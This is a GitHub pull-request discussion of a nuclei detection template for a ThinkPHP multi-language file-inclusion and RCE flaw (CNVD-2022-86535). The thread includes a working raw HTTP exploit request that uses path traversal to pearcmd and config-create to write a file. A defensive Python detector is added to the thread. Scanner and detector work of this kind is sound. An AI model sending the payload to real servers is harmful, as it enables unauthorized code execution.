
CNVD-2022-86535

Open Armandhe-China opened this issue 2 years ago • 1 comments

Template / PR Information

  • Added CNVD-2022-86535
  • References: https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535

Template Validation

I've validated this template locally?

  • [x] YES
  • [ ] NO

Additional Details (leave it blank if not applicable)

Additional References:

Armandhe-China avatar Dec 21 '22 04:12 Armandhe-China

https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2022/CVE-2022-47945.yaml

ViCrack avatar Apr 03 '23 04:04 ViCrack

This should be a duplicate of CVE-2022-47945.

It would be better to merge the two templates into CVE-2022-47945.

https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2022/CVE-2022-47945.yaml

ViCrack avatar Jun 19 '23 10:06 ViCrack

Hello there, @ViCrack. We are adding templates for all possible CVE and CNVD datasets. That said, I checked both templates, and the POC/exploit for the two templates is slightly different. I also tried the CVE-2022-47945 template/POC on the CNVD-2022-86535 vulnerable docker instance, but it did not work.

ritikchaddha avatar Jun 19 '23 11:06 ritikchaddha

@ritikchaddha

My English is not good

CVE-2022-47945 and CNVD-2022-86535 are actually the same vulnerability, which has been duplicated. Just delete one of them. This is an article written by the original author who first discovered this vulnerability: https://tttang.com/archive/1865/


CVE-2022-47945 is written inaccurately because it does not reflect the key point: /usr/local/php/pearcmd

There are at least three trigger points for the vulnerability:

  1. ?lang=xxxxx
  2. think-lang: xxxx
  3. cookie: think_lang=xxxx

Among them, ?lang=xxxxx should be the most compatible and is sufficient, as the other triggering methods may not be effective in higher versions.

For CNVD-2022-86535, of course, these three can also be merged into one to reduce HTTP requests, while removing the unused safedog(), and it is best not to use {{rand_base(10)}}.log for writing files but /tmp/{{rand_base(10)}}.log instead, as the webroot directory may not have write permissions.


This may be a bug in Nuclei: the location of the URL GET parameter has changed. Otherwise, the third data packet would have succeeded.


If the parameter displacement problem in nuclei can be fixed, then the following template should be feasible:

id: CNVD-2022-86535

info:
  name: ThinkPHP Multi Language - File Inclusion And RCE
  author: arliya,ritikchaddha
  severity: high
  description: |
    ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands.
  reference:
    - https://cn-sec.com/archives/1465289.html
    - https://blog.csdn.net/qq_60614981/article/details/128724640
    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535
  metadata:
    verified: true
  tags: cnvd,cnvd2022,thinkphp,rce

variables:
  content: "{{rand_base(5)}}"
  filename: "{{rand_base(10)}}"

http:
  - raw:
      - |
        GET /?lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/{{content}}+/tmp/{{filename}}.log HTTP/1.1
        Host: {{Hostname}}
        think-lang: ../../../../../../../../../../../usr/local/php/pearcmd
        Cookie: think_lang=../../../../../../../../../../../usr/local/lib/php/pearcmd

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "CONFIGURATION"
          - "Successfully created"
          - "PEAR.PHP.NET"
          - "/tmp/{{filename}}"
        condition: and



CVE-2022-47945 and CNVD-2022-86535 are actually the same vulnerability; it is a duplicate, so just delete one of them.

This is the article written by the original author who first discovered this vulnerability: https://tttang.com/archive/1865/

CVE-2022-47945 is written inaccurately, because it does not reflect the key point: /usr/local/php/pearcmd

There are at least three trigger points for the vulnerability:

  1. ?lang=xxxxx
  2. think-lang: xxxx
  3. cookie: think_lang=xxxx

Among them, ?lang=xxxxx should have the best compatibility and is sufficient; the other trigger methods may not work on higher versions.

For CNVD-2022-86535, the three can of course also be merged into one to reduce the number of requests sent, while removing the unused safedog(); and for writing the file it is best not to use {{rand_base(10)}}.log but /tmp/xxxx instead, because the webroot directory may not be writable.

This part may be a nuclei bug: the position of the URL GET parameter changed; otherwise the third request would actually have succeeded.

ViCrack avatar Jun 19 '23 14:06 ViCrack
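As an added example from a defender's view (not part of this thread or of the nuclei-templates project): a small Python check that inspects one request for the three trigger points listed above (the lang query parameter, the think-lang header and the think_lang cookie) and flags values that traverse directories or point at pearcmd. The sample requests are constructed for the example, not captured traffic.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Detector for the three ThinkPHP multi-language trigger points named in the
# thread: the ?lang= query parameter, the think-lang header and the think_lang
# cookie. A value is flagged when it walks up with "../" or names pearcmd.
TRAVERSAL = re.compile(r"\.\.[/\\]")
PEARCMD = re.compile(r"pearcmd", re.IGNORECASE)

def is_suspicious_lang(value: str) -> bool:
    """Percent-decode twice (covers single and double encoding), then inspect."""
    decoded = unquote(unquote(value))
    return bool(TRAVERSAL.search(decoded) or PEARCMD.search(decoded))

def _parse_cookies(header: str) -> dict:
    """Minimal Cookie header parser that tolerates odd characters in values."""
    pairs = (p.strip().split("=", 1) for p in header.split(";") if "=" in p)
    return {k: v for k, v in pairs}

def check_request(request_line: str, headers: dict) -> list:
    """Return the trigger points carrying a suspicious lang value, in the fixed
    order query:lang, header:think-lang, cookie:think_lang (empty = clean)."""
    hits = []
    parts = request_line.split(" ")
    target = parts[1] if len(parts) > 1 else ""
    # keep_blank_values so that a bare "lang=" is still inspected.
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if any(is_suspicious_lang(v) for v in query.get("lang", [])):
        hits.append("query:lang")
    lowered = {k.lower(): v for k, v in headers.items()}
    if is_suspicious_lang(lowered.get("think-lang", "")):
        hits.append("header:think-lang")
    cookies = _parse_cookies(lowered.get("cookie", ""))
    if is_suspicious_lang(cookies.get("think_lang", "")):
        hits.append("cookie:think_lang")
    return hits

# Constructed sample requests (not captured traffic): a benign one, one that
# stacks all three vectors like the template above, one cookie-only (encoded).
SAMPLES = [
    ("GET /?lang=zh-cn HTTP/1.1", {"Host": "example.test"}),
    ("GET /?lang=../../../../../../../../../../../usr/local/lib/php/pearcmd"
     "&+config-create+/abcde+/tmp/xyz.log HTTP/1.1",
     {"Host": "example.test",
      "think-lang": "../../../../../../../../../../../usr/local/php/pearcmd",
      "Cookie": "think_lang=../../../../../../../../../../../usr/local/lib/php/pearcmd"}),
    ("GET /index.php HTTP/1.1",
     {"Cookie": "PHPSESSID=abc; think_lang=..%2f..%2fusr/local/lib/php/pearcmd"}),
]
```

Running check_request over each SAMPLES entry yields an empty list for the benign request, all three trigger points for the stacked one, and only cookie:think_lang for the encoded cookie case.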

@ViCrack I agree that the CVE-2022-47945 template appears to be inaccurate and should be changed. In addition, as previously stated, we are adding/accepting templates for all possible CVE and CNVD datasets.

However, we are aware of the issue of shuffling the parameters when running nuclei, which disrupts the payload execution.

ritikchaddha avatar Jun 19 '23 17:06 ritikchaddha

Hi @Armandhe-China Thank you so much for sharing this template with the community 🔥

You can join our discord server. It's a great place to connect with fellow contributors and stay updated with the latest developments.

DhiyaneshGeek avatar Jul 05 '23 06:07 DhiyaneshGeek